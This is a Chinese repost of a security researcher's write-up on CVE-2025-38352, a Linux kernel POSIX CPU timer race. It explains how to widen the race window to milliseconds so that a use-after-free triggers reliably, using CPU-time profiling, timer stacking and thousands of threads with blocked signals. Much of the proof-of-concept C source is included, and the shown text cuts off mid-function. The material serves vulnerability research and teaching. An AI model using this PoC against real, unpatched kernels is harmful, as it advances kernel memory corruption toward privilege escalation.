2026-01-27 00:41:22 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文详细分析了CVE-2025-38352漏洞的利用优化，通过精确测量系统调用CPU时间、填充firing列表以及创建大量阻塞信号的线程，成功无需内核补丁将竞争窗口延长至毫秒级，从而稳定触发内核UAF并提供了完整的PoC代码 综合评分： 95 文章分类： 漏洞分析,漏洞POC,二进制安全

cover_image

CVE-2025-38352 Part 2 – 无需内核补丁延长竞争窗口

Faraz Faraz

securitainment

2026年1月26日 13:37 广东

| 链接 | 说明 | | — | — | | https://faith2dxy.xyz/2025-12-24/cve_2025_38352_analysis_part_2/ | Faraz |

在 part 1 中，我按步骤演示了如何构造一个能够触发漏洞的 PoC。但很遗憾，它存在一些问题：

如果不打我引入的那个 kernel patch (用来人为把竞争窗口延长 500 ms)，它几乎从不成功。
timer 的设置方式本身也不够“干净”。显然还有更好的方法，可以消耗一段可控的 CPU time，让 timer 在未来某个可控的时刻触发。

在这篇文章里，我会带你一步步看我是如何解决以上两个问题，最终得到一个不需要任何 kernel patch 的 PoC。

PoC + 演示

老规矩，如果你只是来拿 PoC 的，链接在这里：

https://github.com/farazsth98/poc-CVE-2025-38352/blob/main/poc.c

以及一个简短 demo (不带 KASAN)! 😄

demo

作为参考，我的 QEMU 启动命令如下：

qemu-system-x86_64&nbsp;\
&nbsp; &nbsp; -enable-kvm&nbsp;\
&nbsp; &nbsp; -cpu host&nbsp;\
&nbsp; &nbsp; -smp 4&nbsp;\
&nbsp; &nbsp; -kernel ./bzImage&nbsp;\
&nbsp; &nbsp; -initrd ./initramfs.tgz&nbsp;\
&nbsp; &nbsp; -nographic&nbsp;\
&nbsp; &nbsp; -append&nbsp;"console=ttyS0 kgdbwait kgdboc=ttyS1,115200 oops=panic panic=0 nokaslr"\
&nbsp; &nbsp; -m 3G&nbsp;\
&nbsp; &nbsp; -netdev user,id=mynet0&nbsp;\
&nbsp; &nbsp; -device virtio-net-pci,netdev=mynet0&nbsp;\
&nbsp; &nbsp; -s

回顾

继续之前请先读完本系列的 part 1!

在之前的 PoC 里，我在 REAPEE线程中这样消耗 CPU time，以便触发漏洞：

voidreapee(void) {
// [ ... ]

struct&nbsp;itimerspec ts = {
&nbsp; &nbsp; &nbsp; &nbsp; .it_interval&nbsp;= {0,&nbsp;0},
&nbsp; &nbsp; &nbsp; &nbsp; .it_value&nbsp;= {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .tv_sec&nbsp;=&nbsp;0,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .tv_nsec&nbsp;= wait_time,&nbsp;// Custom wait time
&nbsp; &nbsp; &nbsp; &nbsp; },
&nbsp; &nbsp; };

// Wait for parent to attach
pthread_barrier_wait(&barrier);

SYSCHK(timer_settime(timer,&nbsp;0, &ts,&nbsp;NULL));

// Use some CPU time to make sure the timer will fire correctly
for&nbsp;(int&nbsp;i =&nbsp;0; i <&nbsp;1000000; i++);

// Hopefully we used enough CPU time to trigger the timer after `exit_notify()`
// zombifies us and wakes up the parent process
return;
}

wait_time通过 argv传入，而 for循环基本是“拍脑袋”写了个能用的值。本质上，在设置 timer 之后到底会消耗多少 CPU time，是完全不可控的。

能改进吗？当然可以！

CPU Scheduler 内部机制 (其实也没那么深入)

为了理解如何控制线程使用的 CPU time，我做了一次“半深入”的调研：CPU scheduler、POSIX timers，以及不同类型的 CPU timers (CPUCLOCK_PROF、CPUCLOCK_VIRT、CPUCLOCK_SCHED) 的工作方式。

关键要点总结

我不会在这里钻得太深 (说实话这完全值得单独写一篇博客)，这里只总结几个关键点 (总结可能并非 100% 严谨):

CPU scheduler 每隔 1 / CONFIG_HZ秒触发一次中断，此时会运行 run_posix_cpu_timers()。

Android 与 Ubuntu kernels 一般都是这种情况。
通常 CONFIG_HZ=1000，也就是 CPU scheduler 的一次 “tick” 大约每 1 ms 发生一次。

CPU clock timers 主要有三种：

CPUCLOCK_PROF

— 统计 userland + kernel 的总 CPU time。
CPUCLOCK_VIRT

— 只统计 userland 的总 CPU time。
CPUCLOCK_SCHED

— 统计实际在 CPU 上运行的总时间。对会被 scheduler 频繁换入换出的 threads 很重要。

timer 的到期检查总是在 tick 边界发生，因此最多每隔 1 / CONFIG_HZ秒检查一次。
CPUCLOCK_PROF

与 CPUCLOCK_VIRT只有在消耗了 1 / CONFIG_HZ的 CPU time 之后才会被更新。

CPUCLOCK_SCHED

是特例，它会每纳秒更新一次。
这意味着当需要比 1 ms 更细的粒度时，CPUCLOCK_SCHED常用于 profiling。

从“触发漏洞”角度讲，理论上三种 clock types 都能用。

我的 PoC 对 timer 使用的是 CLOCK_THREAD_CPUTIME_ID，它属于 CPUCLOCK_SCHEDtimer。
为什么要用这个特定类型，后文会解释。

以上内容应该足够支撑你理解后面的部分。

Profiling CPU Time 使用量

为了消耗一段可控的 CPU time，我们必须先知道：某个“具体工作量”大约会消耗多少时间。

做 profiling 时，我们需要能在两个或更多执行点获取 (被 profiling 的线程) 已消耗的总 CPU time。可以用 clock_gettimesystem call 来实现。

作为要 profiling 的“具体工作量”，我选择了 getpidsystem call：它易用，而且消耗的 CPU time 很少。

当然，clock_gettimesystem call 本身也会消耗 CPU time，所以在 profiling 代码里也必须把这部分开销算进去。

为此，这里有一段 PoC 代码，用来估算 getpidsystem call 具体消耗多少 CPU time (完整 PoC 点这里):

#defineNUM_SAMPLES100000
staticlongint&nbsp;clock_gettime_avg =&nbsp;0;

// Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls,
// this works just fine
longintgetpid_avg_cputime_used() {
structtimespec&nbsp;*ts =&nbsp;malloc(NUM_SAMPLES *&nbsp;sizeof(structtimespec));

if&nbsp;(clock_gettime_avg ==&nbsp;0) {
for&nbsp;(int&nbsp;i =&nbsp;0; i < NUM_SAMPLES; i++) {
syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
&nbsp; &nbsp; &nbsp; &nbsp; }

longint&nbsp;total_nsec =&nbsp;0;

for&nbsp;(int&nbsp;i =&nbsp;0; i < NUM_SAMPLES-1; i++) {
longint&nbsp;time_taken = (longint)(ts_to_ns(&ts[i +&nbsp;1]) -&nbsp;ts_to_ns(&ts[i]));
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; total_nsec += time_taken;
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp; clock_gettime_avg = total_nsec / (NUM_SAMPLES-1);
&nbsp; &nbsp; }

for&nbsp;(int&nbsp;i =&nbsp;0; i < NUM_SAMPLES; i++) {
syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);

// Do whatever you're measuring here
syscall(__NR_getpid);
&nbsp; &nbsp; }

longint&nbsp;total_nsec =&nbsp;0;
for&nbsp;(int&nbsp;i =&nbsp;0; i < NUM_SAMPLES-1; i++) {
longint&nbsp;time_taken = (longint)(ts_to_ns(&ts[i +&nbsp;1]) -&nbsp;ts_to_ns(&ts[i])) - clock_gettime_avg;
&nbsp; &nbsp; &nbsp; &nbsp; total_nsec += time_taken;
&nbsp; &nbsp; }

free(ts);
return&nbsp;total_nsec / (NUM_SAMPLES-1);
}

下面是我在 QEMU VM (4 cores, 3GB RAM) 上跑出的输出：

/&nbsp;# /poc
clock_gettime avg: 489 ns
getpid avg: 139 ns
/&nbsp;# /poc
clock_gettime avg: 495 ns
getpid avg: 143 ns
/&nbsp;# /poc
clock_gettime avg: 491 ns
getpid avg: 133 ns
/&nbsp;# /poc
clock_gettime avg: 495 ns
getpid avg: 130 ns

显然，这段 PoC 用的是平均值，所以时间并不是 100% 精确；但任何 system call 的 CPU time 在多次运行之间都不可能完全一致，因此我认为取平均值基本就是能做到的最好效果了 (至少我目前是这么觉得的……如果你有更好的计算方式，欢迎告诉我!)

第一个改进：可控的 CPU Time 消耗

我们对 PoC 的第一个改进，是让 REAPEE线程以更可控的方式消耗 CPU time，做法如下：

用 profiling 代码得到 getpidsystem call 的平均 CPU time。
将 timer 设置为在消耗 1 ms (1,000,000ns) CPU time 后触发。
循环执行 getpidsystem call 足够多次，以消耗接近 1 ms 的 CPU time (关键是不要把它完全消耗完!)。

到这里，剩余的 CPU time 将由 kernel 在 do_exit() -> exit_notify()中消耗；如果 getpid循环消耗的 CPU time 刚刚好，那么 timer 就应该在 exit_notify()将 REAPEE线程 zombify 并唤醒负责回收的父进程之后触发，从而触发 handle_posix_cpu_timers()。

上面第 3 步还能更精确：可以通过 patch kernel 来 profiling do_exit() -> exit_notify()消耗的 CPU time，不过我暂时还没折腾这一步。

下面是 PoC 中体现的改动：

// Get the average CPU time usage of the `getpid()` syscall, so we
// can use it for the trigger later
getpid_avg = getpid_cpu_usage();

// [ ... ]

// After timers are armed, waste just the right amount of CPU time now
// without firing any of the timers
for&nbsp;(int&nbsp;i =&nbsp;0; i < ((ONE_MS_NS / getpid_avg) - syscall_loop_times); i++) {
syscall(__NR_getpid);
}

// This `return` will trigger `do_exit()` in the kernel, which hopefully will
// fire the timers after `exit_notify()` wakes up the `waitpid()` in the exploit
// parent process
return;

在上面的 PoC 中，syscall_loop_times是一个变量：初始为 20，每次重试都会递增，在我的 PoC 中上限为 SYSCALL_LOOP_TIMES_MAX=150。由于 CPU time 的消耗并不总是精确，我的最终 PoC 会在每次重试时增加这个值，以确保最终能命中竞争窗口。

仅这一处改动，就大幅提升了 handle_posix_cpu_timers()在 exit_notify()唤醒回收父进程之后才运行的概率。

另外，这也让 PoC 更 system-agnostic：不同系统在做同样的工作量时，实际消耗的 CPU time 可能不同。

延长竞争窗口 (Part 1)

现在来看第二个 (也可能更烦人的) 问题：我们该如何延长竞争窗口？

使用更多 Timers

第一个想到的改进应该很直观。还记得 handle_posix_cpu_timers()会把所有触发的 timers 收集到一个本地 firinglist 里，然后遍历它们 (代码如下，已简化):

staticvoidhandle_posix_cpu_timers(struct&nbsp;task_struct *tsk)
{
// Faith: local `firing` list
LIST_HEAD(firing);

if&nbsp;(!lock_task_sighand(tsk, &flags))
return;

do&nbsp;{
// [ ... ]
// Faith: collect all thread and process timers
check_thread_timers(tsk, &firing);
check_process_timers(tsk, &firing);
&nbsp;}&nbsp;while&nbsp;(!posix_cpu_timers_enable_work(tsk, start));

// [ ... ]
unlock_task_sighand(tsk, &flags);

// Faith: iterate over the `firing` list and fire the timers
list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
// [ ... ]
&nbsp;}
}

我之前的 PoC 只用了一个 timer，这意味着 firinglist 只会被遍历一次。这样留给我们在 timer 被使用前去释放它的时间就很少，对吧？

我们可以做两件事来改进：

把 firinglist 填到最大容量。
让 firinglist 中最后一个 timer 成为我们的目标 UAF timer。

另外，handle_posix_cpu_timers()会先调用 check_thread_timers()，再调用 check_process_timers()。由于 timers 会被插入到 firinglist 的尾部，我们无法利用 process timers：它们都会在我们的 UAF timer 之后被插入。

因此只剩 thread timers 可用。那么我们最多能往 firinglist 里塞多少个？

staticvoidcheck_thread_timers(/* ... */)
{
struct&nbsp;posix_cputimers *pct = &tsk->posix_cputimers;
&nbsp;u64 samples[CPUCLOCK_MAX];
// [ ... ]

task_sample_cputime(tsk, samples);
collect_posix_cputimers(pct, samples, firing);
// [ ... ]
}

staticvoidcollect_posix_cputimers(/* ... */)
{
// [ ... ]
for&nbsp;(i =&nbsp;0; i < CPUCLOCK_MAX; i++, base++) {
&nbsp; base->nextevt =&nbsp;collect_timerqueue(&base->tqhead, firing,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; samples[i]);
&nbsp;}
}

#defineMAX_COLLECTED20

static&nbsp;u64&nbsp;collect_timerqueue(/* ... */)
{
// [ ... ]
while&nbsp;((next =&nbsp;timerqueue_getnext(head))) {
// [ ... ]
/* Limit the number of timers to expire at once */
if&nbsp;(++i == MAX_COLLECTED || now < expires)
return&nbsp;expires;

// [ ... Add the timer to the `firing` list's tail here ... ]
&nbsp;}

return&nbsp;U64_MAX;
}

在上述代码中，CPUCLOCK_MAX表示 CPU Scheduler Internals 一节里提到的三种 clock types，因此它的值为 3。

另外注意，上面 collect_timerqueue()里的 MAX_COLLECTED判断实际上存在 off-by-one：所以每种 clock type 并不是最多收集 20 个 timers，而是最多只会收集到 19 个。

综合起来，我们最多可以在 firing list 中收集 19 * 3 = 57个 timers。更妙的是，我们还有一点“运气”：CPUCLOCK_SCHED(也就是我们用来创建 UAF timer 的 clock type) 恰好是最后一种 clock type!

#defineCPUCLOCK_PROF0
#defineCPUCLOCK_VIRT1
#defineCPUCLOCK_SCHED2
#defineCPUCLOCK_MAX3

在我的 PoC 中，我只使用了 19 个 CPUCLOCK_SCHED类型的 timers，因为这样就足以把竞争窗口延长到能触发漏洞的程度。

不过，由于真正的利用很可能需要使用 cross-cache 技术，把已释放的 struct k_itimer重新分配成别的对象，所以我后面大概率要把这里的 57 个 timers 全都用上。这也是我在 PoC 中选择 CPUCLOCK_SCHED类型 timers 的原因：它能给我们最大的潜在竞争窗口。

一次性触发所有 Timers

为了让所有 timers 同时触发，我们可以利用这样一个事实：CLOCK_THREAD_CPUTIME_ID类型 timer 只有在“创建该 timer 的线程”消耗 CPU time 时才会推进。

因此，要让 19 个 timers 一起触发，我们只需要：

在 REAPEE线程上创建全部 19 个 CPU timers (18 个“stall”timers + 我们的 UAF timer)，然后让它进入休眠。

确保不是 busy sleep，否则会消耗 CPU time。
我用 pthread_barrier_t来实现这一点。

在另一个线程里调用 timer_settime()，把所有 timers 都 arm 为：在消耗 1,000,000ns (1 ms) 的 CPU time 后触发。

由于这个线程并没有创建这些 timers，所以 timers 完全不会推进 (因为正在睡眠的 REAPEE线程才是唯一能推进这些 timers 的线程)。

需要确保把 18 个“stall”timers 设为在消耗 1,000,000 - 1ns CPU time 后触发。

而 UAF timer 仍然要在消耗 1,000,000ns CPU time 后触发。
这样可以保证 UAF timer 是 firinglist 里的最后一个，因为 firing list 会按到期时间排序。

完成以上步骤后，我们就可以唤醒 REAPEE线程，并使用上一节的改进来消耗刚好少于 1 ms 的 CPU time，从而在正确的时刻触发 handle_posix_cpu_timers()。

帮助有多大？

为了弄清 handle_posix_cpu_timers()中遍历 firinglist 实际消耗了多少 CPU time，我使用了这个 kernel patch。我确保它不会“意外延长”竞争窗口 (我的最终 PoC 不依赖这个 patch)。

patch 的关键部分如下：它会 profiling 遍历 firinglist 并触发每个 timer 所花的时间：

@@ -1356,6 +1362,10 @@ static void handle_posix_cpu_timers(struct task_struct *tsk)
&nbsp; &nbsp;*/
&nbsp; unlock_task_sighand(tsk, &flags);

+ // Faith: profile the time taken to handle the timers
+ if (profile)
+ &nbsp;profile_t0 = ktime_get_mono_fast_ns();
+
&nbsp; /*
&nbsp; &nbsp;* Now that all the timers on our list have the firing flag,
&nbsp; &nbsp;* no one will touch their list entries but us. &nbsp;We'll take
@@ -1387,6 +1397,13 @@ static void handle_posix_cpu_timers(struct task_struct *tsk)
&nbsp; &nbsp;rcu_assign_pointer(timer->it.cpu.handling, NULL);
&nbsp; &nbsp;spin_unlock(&timer->it_lock);
&nbsp; }
+
+ // Faith: profile the time taken to handle the timers
+ if (profile) {
+ &nbsp;profile_t1 = ktime_get_mono_fast_ns();
+ &nbsp;printk("handle_posix_cpu_timers: delta_ns=%llu\n",
+ &nbsp; (unsigned long long)(profile_t1 - profile_t0));
+ }

我用来测试这段 profiling 代码的 PoC 在这里。注意，这个 profiling PoC 还包含一些会进一步延长竞争窗口的改动 (我会在下一节讨论)。

这个 PoC 的关键部分如下 (可直接点链接查看):

REAPEE

thread 创建 19 个 timers 后进入休眠。
main thread arm 全部 19 个 timers 并唤醒 REAPEEthread。
REAPEE

thread 消耗足够多的 CPU time 来触发 handle_posix_cpu_timers()。

运行该 PoC 后的 dmesg日志如下 (不包含那些会进一步延长竞争窗口的额外改动):

~ $ /poc
[ &nbsp;&nbsp;10.543155] handle_posix_cpu_timers: delta_ns=3140
~ $ /poc
[ &nbsp;&nbsp;10.964147] handle_posix_cpu_timers: delta_ns=4990
~ $ /poc
[ &nbsp;&nbsp;11.404146] handle_posix_cpu_timers: delta_ns=6000

平均来看，遍历 firinglist 中的 19 个 timers 大约会花 4000-7000ns。

根据我的测试，这仍然不足以触发漏洞：

在回收 zombie REAPEEthread 之后，依然很难让 timer_delete()精准命中这个窗口。
即使我们“赢了”竞争，也几乎没有时间让 RCU free 发生。

所以我们必须想办法把竞争窗口延长得更多……纳秒级不够，我们需要毫秒级！

延长竞争窗口 (Part 2)

从宏观上看，我们还有两个思路可以延长竞争窗口：

遍历 list 时，会尝试获取 timer->it_lock，稍后还会获取 task->sighand->siglock。如果能在合适时机让另一颗 CPU 长时间持有这些锁，就能延长竞争窗口。
触发 timers 涉及发送 signals、重新 arm timers 以及一堆其它逻辑。也许可以研究这条链路，看看有没有办法把竞争窗口拉长？

选项 1：锁冲突 (Lock Collisions)

我审计了所有会获取 timer->it_lock与 task->sighand->lock的代码路径，试图找出是否存在“能长时间持锁”的选项。但这个思路有几个问题。

第一个问题与竞争窗口太短有关：不仅要在窗口内抢到其中任意一个锁，还必须在 firinglist 即将为特定 timer/task 获取该锁的那个瞬间抢到。这在 4000-7000ns 的窗口里几乎不可能做到。

第二个问题是：我找不到任何能以“大 / 可控时长”持有这些锁的代码路径。例如，虽然 timer_gettime()会调用 copy_to_user()，但它在这之前就释放了 timer->it_lock。总体来说，所有路径都是快速加锁、快速释放。

不过，我之前从 Jann Horn 的一篇博客里学到了一点：preemptible kernels (例如 Android kernel) 理论上可以在任意点 preempt 代码，除非代码运行在禁用 preemption 的上下文中。

知道这一点之后，我想：能不能让另一颗 CPU 上的某个 task 抢到 timer->it_lock/ task->sighand->lock，然后让它被 preempt，从而把锁“卡住”更久？

遗憾的是不行。这两个锁都是通过 spin_lock()/spin_lock_irq()/spin_lock_irqsave()获取的，在持锁期间会禁用 preemption。

因此，锁冲突这条路可以彻底排除。

选项 2：让 Timers 的触发过程更“长”

我花了不少时间审计 cpu_timer_fire()，看看 timer 的触发逻辑是怎么实现的。我主要在找：有没有某些 loops，可以让我从 userland 对迭代次数施加控制。

其中 complete_signal()引起了我的注意。它可以通过下面的调用栈到达：

handle_posix_cpu_timers()
-> cpu_timer_fire()
-> posix_timer_queue_signal()
-> send_sigqueue()
-> complete_signal()

在 complete_signal()中，我注意到有两个 while loop (代码如下，已简化):

staticvoidcomplete_signal(int&nbsp;sig,&nbsp;struct&nbsp;task_struct *p,&nbsp;enum&nbsp;pid_type type)
{
// [ ... ]
// Faith: If a PID is specified to deliver the signal to, and that thread / process
// &nbsp; &nbsp; &nbsp; &nbsp;is accepting this signal, use it
if&nbsp;(wants_signal(sig, p))
&nbsp; t = p;
// Faith: Else if that PID does accept this signal, and there are no other threads,
// &nbsp; &nbsp; &nbsp; &nbsp;just return early.
elseif&nbsp;((type == PIDTYPE_PID) ||&nbsp;thread_group_empty(p))
return;
else&nbsp;{
// Faith: iterate over every thread until we find one that is accepting this
// &nbsp; &nbsp; &nbsp; &nbsp;signal
&nbsp; t =&nbsp;signal->curr_target;
while&nbsp;(!wants_signal(sig, t)) {
&nbsp; &nbsp;t =&nbsp;next_thread(t);
if&nbsp;(t ==&nbsp;signal->curr_target)
// Faith: no thread found accepting this signal, just return
return;
&nbsp; }
signal->curr_target = t;
&nbsp;}

// Faith: If a fatal signal is detected (and some other conditions)
if&nbsp;(sig_fatal(p, sig) &&
&nbsp; &nbsp; &nbsp;(signal->core_state || !(signal->flags & SIGNAL_GROUP_EXIT)) &&
&nbsp; &nbsp; &nbsp;!sigismember(&t->real_blocked, sig) &&
&nbsp; &nbsp; &nbsp;(sig == SIGKILL || !p->ptrace)) {
// [ ... ]
// Faith: The code here iterates over every thread in this thread
// &nbsp; &nbsp; &nbsp; &nbsp;group and delivers a `SIGKILL` to it to kill it.
&nbsp;}
// [ ... ]
}

在上面的代码里，有两个循环：

如果我们让 timer 发送 signal 时不指定 TID，就会进入第一个 whileloop。它会遍历 thread group 里的每个 thread，寻找一个没有把该 signal block 掉的 thread (signals 可以通过 sigprocmask()来 block)。
第二个循环被我注释掉了，但它只会在“要投递的 signal 被认为是 fatal” (再加上一些其它条件) 时进入。它会杀掉该 thread group 中的每个 thread。

我认为第二个循环在实践中基本不可用，因为它会杀掉整个 thread group。不过我也不想把话说死 😅 也许存在一种场景：多个进程能被同步到在同一个 CPU 上触发它们的 timers。在这种场景里，其它“无关”进程即便被杀也不会影响主 exploit 进程，从而让第二个循环变得可能可用。但我没有测试或验证过这一点。

在我的 PoC 中，我只利用了第一个 whileloop 来延长竞争窗口。下面我们就来看看如何做到这一点。

第二个改进：刷线程 (Spamming Threads)

从上面对 complete_signal()的分析可知：它会遍历当前进程中的每一个 thread，直到找到一个“愿意接收”该 signal 的 thread。

那么 wants_signal()是怎么实现的？(代码如下，已简化)

staticinlineboolwants_signal(int&nbsp;sig,&nbsp;struct&nbsp;task_struct *p)
{
if&nbsp;(sigismember(&p->blocked, sig))
returnfalse;

// [ ... ]
}

wants_signal()里其实还有一些其它条件，但它首先检查的是：该 thread 是否 block 了 timer 试图发送的 signal。

->blocked字段保存了一张 bitmap，用于表示哪些 signals 被 block。我们可以通过 sigprocmask()+ SIG_BLOCK往里面添加 signals (代码如下，已简化):

intsigprocmask(int&nbsp;how,&nbsp;sigset_t&nbsp;*set,&nbsp;sigset_t&nbsp;*oldset)
{
// [ ... ]
switch&nbsp;(how) {
case&nbsp;SIG_BLOCK:
sigorsets(&newset, &tsk->blocked, set);
break;
// [ ... ]
&nbsp;}

__set_current_blocked(&newset);
return0;
}

因此，结合以上信息，我们就能强迫 kernel 在每一个“stall”timer 上把这段 while loop 跑很多次。唯一的限制，是我们能创建多少 threads。

实现步骤如下：

在 exploit child process 创建任何 threads 之前，先通过 sigprocmask()block SIGUSR1。

exploit child process 就是包含 REAPEEthread 的那个进程。

创建 REAPEEthread。在创建 timers 时，确保 timer 的 sigevent.sigev_notify设置为 SIGEV_SIGNAL。

这样会尝试把 signal 发送给当前 thread group 中任意一个会接收该 signal 的 thread。

在 exploit child process 里尽可能多地创建 threads (我用的是 NUM_SLEEP_THREADS=10000)。

这些 threads (以及上面的 REAPEEthread) 会继承 exploit child process 的 SIGUSR1blocked 状态。

按照原流程继续触发漏洞即可。

当 timers 触发后，handle_posix_cpu_timers()内部遍历 firinglist 时，会为每个 timer 调用一次 complete_signal()；而每个 timer 都会在 complete_signal()的 whileloop 里迭代 NUM_SLEEP_THREADS=10000次才返回。

我已经在同一个 profiling PoC 里实现了这一点。加上第二个改进后，运行结果如下：

~ $ /poc
[ &nbsp; &nbsp;2.386969] handle_posix_cpu_timers: delta_ns=4895749
~ $ /poc
[ &nbsp; &nbsp;3.101971] handle_posix_cpu_timers: delta_ns=3904588
~ $ /poc
[ &nbsp; &nbsp;3.679125] handle_posix_cpu_timers: delta_ns=4052398

提升巨大！遍历 firinglist 的耗时现在大约在 4,000,000-5,000,000ns (4-5 ms) 之间！这绝对足够让我们同时做到：

在竞争窗口内命中 timer_delete()。
让 RCU free 有时间完成，从而触发 UAF。

至此，PoC 就能在不需要任何“人为 kernel patch”的情况下触发该竞争条件。

其它改进与想法

我还对最终 PoC 做了一些额外改进：

我把重试逻辑直接写进了 PoC，因此你只需要运行 /poc，不再需要 while true; do /poc; done。
我在删除 timer 之前加了一个 1 ms sleep。由于竞争窗口至少会打开 3 ms，这个 sleep 有助于确保 timer_delete()真的落在竞争窗口里。

Part 3 的计划？

写这篇文章时，我确定会继续研究这个漏洞的 exploit。cross-cache 在这里完全可行，关键只是要判断“什么时候赢了竞争、什么时候输了竞争”。

不过现在是节假日，距离我真正把它收尾可能还要一段时间。但请放心：这个漏洞非常适合用来练手并提升 exploit development 技能，所以我对把它做完这件事很有信心！😄

结语

一如既往，如果你有任何问题，欢迎随时提问！

最终 PoC

最终 PoC、kernel profiler patch (以及我用来测试竞争窗口长度的 profiling PoC) 都在我的 Github repo 里：

https://github.com/farazsth98/poc-CVE-2025-38352

我也会把 demo 和 PoC 放在下方。本文到这里就结束了！

demo

#define_GNU_SOURCE
#include<time.h>
#include<signal.h>
#include<stdio.h>
#include<unistd.h>
#include<pthread.h>
#include<sys/ptrace.h>
#include<sys/wait.h>
#include<sys/types.h>
#include<stdlib.h>
#include<err.h>
#include<sys/prctl.h>
#include<sched.h>
#include<linux/membarrier.h>
#include<sys/syscall.h>

#defineSYSCHK(x) ({ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\
typeof(x) __res = (x); &nbsp; &nbsp; &nbsp;\
if&nbsp;(__res == (typeof(x))-1) \
err(1,&nbsp;"SYSCHK("&nbsp;#x&nbsp;")"); \
&nbsp; &nbsp; __res; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\
})

#defineNUM_SAMPLES100000
#defineNUM_TIMERS18
#defineONE_MS_NS&nbsp;1000000uLL
#defineNUM_SLEEP_THREADS10000
#defineNUM_SLEEP_THREADS_KASAN4500// KASAN has a smaller thread limit
#defineSYSCALL_LOOP_TIMES_MAX150

voidpin_on_cpu(int&nbsp;i) {
cpu_set_t&nbsp;mask;
CPU_ZERO(&mask);
CPU_SET(i, &mask);
sched_setaffinity(0,&nbsp;sizeof(mask), &mask);
}

voidwait_for_rcu() {
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL,&nbsp;0);
}

staticinlinelonglongts_to_ns(conststructtimespec&nbsp;*ts) {
return&nbsp;(longlong)ts->tv_sec *&nbsp;1000000000LL&nbsp;+ (longlong)ts->tv_nsec;
}

staticlongint&nbsp;clock_gettime_avg =&nbsp;0;
staticlongint&nbsp;getpid_avg =&nbsp;0;

// Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls,
// this works just fine
longintgetpid_cpu_usage() {
structtimespec&nbsp;*ts =&nbsp;malloc(NUM_SAMPLES *&nbsp;sizeof(structtimespec));

// If we don't have `clock_gettime` avg CPU time usage, get it now
if&nbsp;(clock_gettime_avg ==&nbsp;0) {
for&nbsp;(int&nbsp;i =&nbsp;0; i < NUM_SAMPLES; i++) {
syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
&nbsp; &nbsp; &nbsp; &nbsp; }

longint&nbsp;total_nsec =&nbsp;0;

for&nbsp;(int&nbsp;i =&nbsp;0; i < NUM_SAMPLES-1; i++) {
longint&nbsp;time_taken = (longint)(ts_to_ns(&ts[i +&nbsp;1]) -&nbsp;ts_to_ns(&ts[i]));
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; total_nsec += time_taken;
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp; clock_gettime_avg = total_nsec / (NUM_SAMPLES-1);
&nbsp; &nbsp; }

for&nbsp;(int&nbsp;i =&nbsp;0; i < NUM_SAMPLES; i++) {
syscall(__NR_clock_gettime, CLOCK_THREAD_CPUTIME_ID, &ts[i]);
syscall(__NR_getpid);
&nbsp; &nbsp; }

longint&nbsp;total_nsec =&nbsp;0;
for&nbsp;(int&nbsp;i =&nbsp;0; i < NUM_SAMPLES-1; i++) {
longint&nbsp;time_taken = (longint)(ts_to_ns(&ts[i +&nbsp;1]) -&nbsp;ts_to_ns(&ts[i])) - clock_gettime_avg;
&nbsp; &nbsp; &nbsp; &nbsp; total_nsec += time_taken;
&nbsp; &nbsp; }

free(ts);
return&nbsp;total_nsec / (NUM_SAMPLES-1);
}

/* Global variables for exploit setup START */
pthread_barrier_t&nbsp;barrier;

// Timers used to stall `handle_posix_cpu_timers()` to extend the race window
timer_t&nbsp;stall_timers[NUM_TIMERS];
timer_t&nbsp;uaf_timer;

// Thread that will trigger the timer handling, and also the thread that will
// be reaped by the exploit parent process
pthread_t&nbsp;reapee_thread;

int&nbsp;e2w[2];&nbsp;// exploit process to wrapper process comm pipefds
int&nbsp;c2p[2];&nbsp;// child to parent comm pipefds
int&nbsp;p2c[2];&nbsp;// parent to child comm pipefds
int&nbsp;stall_fds[2];&nbsp;// stall pipe fds for the sleep func

// Amount of LESS times to loop the `getpid()` syscall to waste CPU time
int&nbsp;syscall_loop_times =&nbsp;20;
int&nbsp;retry_count =&nbsp;0;
/* Global variables for exploit setup END */

voidreapee_func(void) {
// Pin to same CPU as sleeper threads
pin_on_cpu(2);
structsigevent&nbsp;sev = {0};
&nbsp; &nbsp; sev.sigev_notify&nbsp;= SIGEV_SIGNAL;
&nbsp; &nbsp; sev.sigev_signo&nbsp;= SIGUSR1;
char&nbsp;m;

prctl(PR_SET_NAME,&nbsp;"REAPEE");

// Send this thread's TID to the parent process
pid_t&nbsp;tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(c2p[1], &tid,&nbsp;sizeof(pid_t)));

// Wait for parent to attach and continue
pthread_barrier_wait(&barrier);&nbsp;// barrier 1

// Create the maximum amount of timers minus one
for&nbsp;(int&nbsp;i =&nbsp;0; i < NUM_TIMERS; i++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &stall_timers[i]));
&nbsp; &nbsp; }

// Create the UAF timer as the last timer
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &uaf_timer));

// Wait for the main thread to arm the timers. This is to make sure
// this thread does not use CPU time to arm the timers.
pthread_barrier_wait(&barrier);&nbsp;// barrier 2
pthread_barrier_wait(&barrier);&nbsp;// barrier 3

// Waste just the right amount of CPU time now without firing any of the timers
for&nbsp;(int&nbsp;i =&nbsp;0; i < ((ONE_MS_NS / getpid_avg) - syscall_loop_times); i++) {
syscall(__NR_getpid);
&nbsp; &nbsp; }

// This `return` will trigger `do_exit()` in the kernel, which hopefully will
